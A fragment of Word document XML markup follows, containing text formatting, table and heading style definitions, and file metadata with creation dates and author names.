      <w:color w:val="156082" w:themeColor="accent1" w:themeTint="FF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1">
            <w14:lumMod w14:val="100000"/>
            <w14:lumOff w14:val="0"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill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paragraph" w:styleId="7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ead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9">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="5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ing 3 Char"/>
    <w:basedOn w:val="4"/>
    <w:link w:val="3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TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate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2025-09-03T11:43:00Z</dcterms:created>
  <dc:creator>Esraa Waleed</dc:creator>
  <cp:lastModifiedBy>Esraa Walid</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-03T17:10:07Z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F89B225C66AD4DAA895ED0B9C7C9184E_12</vt:lpwstr>
  </property>
</Properties>
</file>